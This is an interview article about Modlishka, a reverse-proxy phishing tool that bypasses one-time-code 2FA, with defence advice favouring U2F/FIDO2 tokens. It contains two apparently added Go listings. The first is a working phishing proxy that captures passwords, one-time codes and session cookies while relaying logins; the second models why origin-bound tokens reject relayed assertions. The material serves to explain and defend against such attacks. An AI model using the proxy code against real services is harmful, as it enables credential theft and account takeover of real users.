Is Two-Factor Authentication as we Know it Dead?

4th of April 2019

- challenging traditional 2FA with Modlishka

Interview with Piotr Duszynski, by Frederikke Knop

While most users consider two-factor authentication (2FA) the best security measure to stop attackers from breaking into your account, it does have weaknesses that can be exploited in phishing attacks. 

An article published by Amnesty International in December 2018 showed how weaknesses in common forms of two-factor authentication are being exploited by attackers around the world. A month later, FortConsult’s managing security consultant Piotr Duszynski was swiftly bypassing 2FA with the help of his shiny new tool.

Meet “Modlishka”, Piotr’s own pentesting tool, which automates phishing attacks and seamlessly bypasses 2FA in a matter of seconds.

Introducing Modlishka

Me: “Hi Piotr; tell us about Modlishka.” 

Piotr: “Modlishka is a tool I developed for penetration testing purposes that can bypass 2FA and help automate phishing attacks. It works by sending targeted users a link that looks like a legitimate and trusted site like Gmail or Hotmail, but instead, the link goes through a web proxy, which always serves users with the latest version of the proxied site. You should be trained in knowing what the difference is, to spot it.”

“Reverse proxies have been around for more than 10 years,” Piotr explains, “there’s nothing new about them.” It is the way Modlishka handles the traffic that makes it special:

“Modlishka utilises a reverse proxy. It intercepts all the traffic from the user’s browser, inspects it, modifies it, and then forwards it to the target website. It’s based on a well-known attack scheme called man-in-the-middle and is pretty much transparent and automated in a way that supports all websites based on HTTP, which is super useful for ethical penetration testers.”

Moreover, Modlishka keeps a copy of the authenticated session alongside the captured credentials, so the attacker can reuse it to get into the account later on.
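As an added illustration of the mechanism Piotr describes (this is not Modlishka’s own code, which is not reproduced here), the Go program below builds a minimal transparent reverse proxy on the standard library’s httputil.ReverseProxy. It forwards a victim’s login POST to the real service, records the submitted username, password and one-time code together with the session cookie the service issues, and rewrites the real hostname in the returned HTML so the victim stays on the proxy. The login service, the hostnames accounts.example-mail.test and accounts.mail-login.test, and the credentials are constructed for the example; the proxied request is delivered in process, so the program runs offline.

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
	"strconv"
	"strings"
)

// Loot is what the proxy harvests while relaying a login: each submitted form
// (password and one-time code included) and the session cookies the real site
// issues once the second factor has been accepted. The demo serves one request;
// a concurrent proxy must guard this with a mutex.
type Loot struct {
	Credentials []url.Values
	Cookies     []*http.Cookie
}

// NewPhishProxy relays requests arriving for phishHost to target, records
// credentials and Set-Cookie headers on the way through, and rewrites the real
// hostname in the returned HTML so the victim never leaves the proxy.
func NewPhishProxy(target *url.URL, phishHost string, loot *Loot, rt http.RoundTripper) *httputil.ReverseProxy {
	rp := httputil.NewSingleHostReverseProxy(target)
	rp.Transport = rt
	direct := rp.Director
	rp.Director = func(r *http.Request) {
		if r.Method == http.MethodPost && strings.HasPrefix(r.Header.Get("Content-Type"), "application/x-www-form-urlencoded") {
			body, _ := io.ReadAll(r.Body)
			if vals, err := url.ParseQuery(string(body)); err == nil {
				loot.Credentials = append(loot.Credentials, vals)
			}
			r.Body = io.NopCloser(bytes.NewReader(body)) // forward the body untouched
		}
		direct(r)
		r.Host = target.Host // the real site must see its own Host header
	}
	rp.ModifyResponse = func(resp *http.Response) error {
		// The real site's session cookies: with these the attacker is logged in
		// without needing the password or the one-time code again.
		loot.Cookies = append(loot.Cookies, resp.Cookies()...)
		if strings.HasPrefix(resp.Header.Get("Content-Type"), "text/html") {
			body, err := io.ReadAll(resp.Body)
			resp.Body.Close()
			if err != nil {
				return err
			}
			body = bytes.ReplaceAll(body, []byte(target.Host), []byte(phishHost))
			resp.Body = io.NopCloser(bytes.NewReader(body))
			resp.ContentLength = int64(len(body))
			resp.Header.Set("Content-Length", strconv.Itoa(len(body)))
		}
		return nil
	}
	return rp
}

// inProcess delivers the proxied request straight to a handler, so the demo
// runs with no network at all; a real deployment uses http.DefaultTransport.
type inProcess struct{ h http.Handler }

func (t inProcess) RoundTrip(r *http.Request) (*http.Response, error) {
	rec := httptest.NewRecorder()
	t.h.ServeHTTP(rec, r)
	return rec.Result(), nil
}

// fakeTarget stands in for the real login service (constructed for this
// example): one hard-coded user, password and OTP, then a session cookie.
func fakeTarget() http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.ParseForm() != nil || r.FormValue("user") != "alice" || r.FormValue("pass") != "hunter2" || r.FormValue("otp") != "123456" {
			http.Error(w, "bad credentials", http.StatusUnauthorized)
			return
		}
		http.SetCookie(w, &http.Cookie{Name: "SID", Value: "session-token-abc", Path: "/", HttpOnly: true, Secure: true})
		w.Header().Set("Content-Type", "text/html")
		fmt.Fprintf(w, `<html><body>Welcome alice. <a href="https://%s/inbox">Inbox</a></body></html>`, r.Host)
	})
}

// RunScenario drives one victim login through the proxy entirely in process and
// returns the loot, the page the victim saw and the HTTP status.
func RunScenario() (*Loot, string, int) {
	target, _ := url.Parse("https://accounts.example-mail.test") // hypothetical real site
	loot := &Loot{}
	proxy := NewPhishProxy(target, "accounts.mail-login.test", loot, inProcess{fakeTarget()}) // hypothetical phishing host
	form := url.Values{"user": {"alice"}, "pass": {"hunter2"}, "otp": {"123456"}}
	req := httptest.NewRequest(http.MethodPost, "https://accounts.mail-login.test/login", strings.NewReader(form.Encode()))
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	rec := httptest.NewRecorder()
	proxy.ServeHTTP(rec, req)
	return loot, rec.Body.String(), rec.Code
}

func main() {
	loot, page, status := RunScenario()
	fmt.Printf("victim saw %d and page %s\ncaptured forms: %v\ncaptured cookies: %v\n", status, page, loot.Credentials, loot.Cookies)
}
```

The one-time code is captured and relayed in the same request as the password, which is why a code-based second factor gives no protection here: the proxy never has to break it, only pass it on within its validity window and keep the resulting session cookie.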

Spot the difference when logging into Gmail:

[Screenshot: Gmail login]

...and the Modlishka version here:

[Screenshot: Modlishka Google login]

Improving industry knowledge

Initially, Piotr developed the tool for professional use in his job as a security consultant performing penetration tests for clients. To move the industry forward, however, Piotr published the code for Modlishka to point out the obvious areas for improvement within the cyber security industry and to bring simulated attacks up to date with real-life attacks: “Traditional two-factor authentication is no longer adequate to the credential-type of threats that have been spotted on the Internet throughout the past year. We need to be capable of preventing these types of attacks in the industry in order to maintain a strong security level,” says Piotr, and continues: “Now we can see where our current security measures are failing and how we can improve them.”

Being able to automate phishing attacks with Modlishka in this manner underlines that the IT industry needs to invest in better solutions and more resilient designs, and take all factors into account when working with cyber security. And, according to Piotr, the impact Modlishka has made is tangible: “I get a lot of positive feedback from security consultants, who tell me that this tool has helped them get the attention of their board of directors and helped them emphasise the importance of investing in anti-phishing security defences such as employee awareness. I’m really happy about that.”

How to beat a tool like Modlishka

So, how can you stop a man-in-the-middle attack like Modlishka? Well, it’s difficult, at least from a technical point of view, says Piotr: “Defending against a reverse proxy is tricky. In fact, only U2F-based tokens are immune to such attacks at the moment.” Authentication with a U2F or FIDO2 (WebAuthn) token resists this attack for a specific reason: the browser binds the origin it is actually connected to into the data the token signs, so an assertion produced on the proxy’s domain is not valid for the real site’s domain, and the relayed login fails. The token also has to be physically present and touched, which rules out replaying the factor remotely.
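Why the origin-bound factor survives the proxy, as an added example in Go (not code from Piotr or from the FIDO projects): a model of a U2F-style assertion in which the browser writes the origin it is actually connected to into the signed client data. The relying party checks that origin against its own and verifies an ECDSA signature that covers the client data, so an assertion produced on the proxy’s domain is rejected, and the proxy cannot patch the origin field without breaking the signature. A real browser also refuses to sign for an app ID or RP ID that does not belong to the page’s origin, which stops the relay even earlier; the model shows only the server-side check. The hostnames and the challenge are constructed.

```go
package main

import (
	"bytes"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/binary"
	"encoding/json"
	"fmt"
)

// clientData is what the browser hands the token to sign. The browser, not the
// page, fills in Origin with the site it is actually connected to.
type clientData struct {
	Challenge string `json:"challenge"`
	Origin    string `json:"origin"`
}

// Assertion is the U2F-style sign response: client data, 37 bytes of authenticator
// data (appID hash, presence flag, counter) and ECDSA over sha256(authData || sha256(clientData)).
type Assertion struct{ ClientData, AuthData, Signature []byte }

// sign is the browser-to-token call. A phishing proxy relays the page and the
// challenge unchanged, but it cannot change the origin the browser writes here.
func sign(key *ecdsa.PrivateKey, counter uint32, appID, challenge, origin string) (Assertion, error) {
	cd, err := json.Marshal(clientData{challenge, origin})
	if err != nil {
		return Assertion{}, err
	}
	appHash := sha256.Sum256([]byte(appID))
	auth := make([]byte, 37)
	copy(auth, appHash[:])
	auth[32] = 0x01 // user presence: the token was touched
	binary.BigEndian.PutUint32(auth[33:], counter)
	sig, err := ecdsa.SignASN1(rand.Reader, key, signedDigest(auth, cd))
	return Assertion{cd, auth, sig}, err
}

func signedDigest(auth, cd []byte) []byte {
	cdHash := sha256.Sum256(cd)
	d := sha256.Sum256(append(append([]byte{}, auth...), cdHash[:]...))
	return d[:]
}

// RelyingParty is the real site: it knows its own origin and the registered
// public key, and rejects anything signed for a different origin.
type RelyingParty struct {
	Origin, AppID string
	Pub           *ecdsa.PublicKey
}

func (rp RelyingParty) Verify(challenge string, a Assertion) error {
	var cd clientData
	if err := json.Unmarshal(a.ClientData, &cd); err != nil {
		return err
	}
	if cd.Origin != rp.Origin {
		return fmt.Errorf("origin mismatch: signed for %s, expected %s", cd.Origin, rp.Origin)
	}
	appHash := sha256.Sum256([]byte(rp.AppID))
	if cd.Challenge != challenge || len(a.AuthData) != 37 || !bytes.Equal(a.AuthData[:32], appHash[:]) {
		return fmt.Errorf("challenge or application parameter mismatch")
	}
	if !ecdsa.VerifyASN1(rp.Pub, signedDigest(a.AuthData, a.ClientData), a.Signature) {
		return fmt.Errorf("bad signature")
	}
	return nil
}

// Scenarios plays one token against the real site three ways and returns each
// outcome (nil = accepted). Hostnames and the challenge are constructed.
func Scenarios() (map[string]error, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	site := RelyingParty{Origin: "https://accounts.example-mail.test", AppID: "https://accounts.example-mail.test", Pub: &key.PublicKey}
	const challenge = "c29tZS1yYW5kb20tbm9uY2U" // would be fresh and random per login
	const phish = "https://accounts.mail-login.test"
	direct, err1 := sign(key, 1, site.AppID, challenge, site.Origin) // user on the real site
	relayed, err2 := sign(key, 2, site.AppID, challenge, phish)      // user on the proxy's domain
	if err1 != nil || err2 != nil {
		return nil, fmt.Errorf("signing failed: %v %v", err1, err2)
	}
	tampered := relayed // the proxy edits the origin field before forwarding
	tampered.ClientData = bytes.ReplaceAll(relayed.ClientData, []byte(phish), []byte(site.Origin))
	return map[string]error{
		"direct":   site.Verify(challenge, direct),
		"relayed":  site.Verify(challenge, relayed),
		"tampered": site.Verify(challenge, tampered),
	}, nil
}

func main() {
	results, err := Scenarios()
	fmt.Println(results, err)
}
```

Contrast this with a one-time code: the code is just a string the victim types into whatever page is in front of them, so nothing ties it to the domain, and the proxy forwards it as-is. The signed origin is what the proxy cannot forge.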

Where the real issue lies, however, is in how organisations deal with the risks associated with social engineering: “User awareness and ensuring that your employees are up-to-date with modern social engineering, and the right technical security measures, such as FIDO2 tokens, should be your move towards defending yourself against man-in-the-middle attacks,” recommends Piotr.

Piotr’s three steps to defending yourself against credential-focused attacks:

  • use U2F hardware tokens as your second authentication factor
  • use password managers – they ensure that the domain name in your browser is correct before pasting in the password
  • constantly raise user and employee awareness about current social engineering techniques

2FA is not dead, but...

So, is 2FA really dead? No, two-factor authentication is still the best thing around when it comes to adding another layer of protection for your credentials. But it is not a silver bullet. Modlishka is living proof that traditional 2FA can be bypassed fairly easily by someone with the right technical skills.

What is dead is 2FA as we know it, as the standard stand-alone protection. Continuous user awareness of modern phishing techniques, combined with a move to origin-bound second factors such as U2F (Universal 2nd Factor) and FIDO2 hardware tokens used over USB or NFC, is the best defence against tomorrow’s malicious campaigns.

Watch Piotr Duszynski’s Modlishka demo here.
